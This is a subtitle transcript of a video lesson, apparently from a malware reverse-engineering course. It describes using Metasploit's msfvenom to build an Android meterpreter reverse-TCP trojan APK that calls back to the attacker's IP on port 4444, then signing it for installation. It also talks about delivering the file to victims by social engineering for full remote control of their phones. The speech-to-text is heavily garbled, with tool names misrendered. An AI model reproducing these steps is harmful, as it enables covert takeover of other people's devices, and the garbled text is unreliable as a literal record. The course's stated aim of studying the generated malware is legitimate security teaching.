1
00:00:00,360 --> 00:00:06,720
In this video, we will learn how to create a malicious Android application that once the user or the

2
00:00:06,720 --> 00:00:07,890
victim invokes it.

3
00:00:08,310 --> 00:00:14,100
It connects back to our Kelly machine using reverse DCP once it connects.

4
00:00:14,400 --> 00:00:18,420
We will have full remote access and control to that device.

5
00:00:19,200 --> 00:00:28,080
So open your terminal and drive, can you, to start the Posterous Ezekial service and then write a

6
00:00:28,080 --> 00:00:32,430
mass of console to start the metal supplied framework.

7
00:00:32,970 --> 00:00:38,640
Now open your browser and go to any website that will show you your current public IP.

8
00:00:39,600 --> 00:00:40,650
Or just copy that.

9
00:00:42,690 --> 00:00:44,460
Now the framework is starting.

10
00:00:45,420 --> 00:00:48,120
And here is the new command line.

11
00:00:48,750 --> 00:01:00,810
So without going into the details of how the you just need to type Emmas of venom or venom dash B for

12
00:01:00,810 --> 00:01:02,820
payload and the payload will be Android.

13
00:01:06,970 --> 00:01:08,110
Then forward slash.

14
00:01:09,910 --> 00:01:19,110
Metro operator, the forward slash reverse underscore TCAP, you do press space button local host.

15
00:01:20,320 --> 00:01:31,120
I'll just paste the IP address then local port that will listen to the incoming connection from the

16
00:01:31,420 --> 00:01:33,100
compromised mobile phone.

17
00:01:33,160 --> 00:01:34,600
Let's say four four four four.

18
00:01:35,140 --> 00:01:38,860
Now I will export that to the desktop.

19
00:01:39,760 --> 00:01:41,530
I'll provide the path home.

20
00:01:42,550 --> 00:01:44,680
My user desktop.

21
00:01:44,710 --> 00:01:49,530
Then I'll call it like Trojans or HBK.

22
00:01:50,470 --> 00:01:51,070
And that's it.

23
00:01:51,650 --> 00:01:59,680
Now I have created a malicious application that I need to send to the end user using various social

24
00:01:59,680 --> 00:02:00,850
engineering techniques.

25
00:02:01,540 --> 00:02:07,000
And once the end user invokes that, I need to prepare the other half of the attack.

26
00:02:07,040 --> 00:02:11,320
I need to set up a listener on this machine to accept incoming connection.

27
00:02:11,620 --> 00:02:18,700
But for the sake of discourse, we'll just use this Trojan that HBK to reverse engineer it and see how

28
00:02:18,700 --> 00:02:25,630
the malware is created or how the malicious code is being populated by the Metters Floyd framework.

29
00:02:26,290 --> 00:02:32,680
I will upload Trojan DOT APC a file to my get up repository so you can download it and apply what you

30
00:02:32,680 --> 00:02:35,110
will learn in this course on this file.

31
00:02:36,160 --> 00:02:44,440
It is important to sign the APC a file before being able to install it on Android devices for this purpose.

32
00:02:44,560 --> 00:02:51,920
Open the terminal and issue that comen D to J dash ap k dash.

33
00:02:52,060 --> 00:02:57,520
Sign and then put the name of the file and just press enter.

34
00:02:59,080 --> 00:03:05,610
You'll notice here that another APJ file has been created with dush sign dot ap key.

35
00:03:05,950 --> 00:03:08,450
You can rename the file before using it.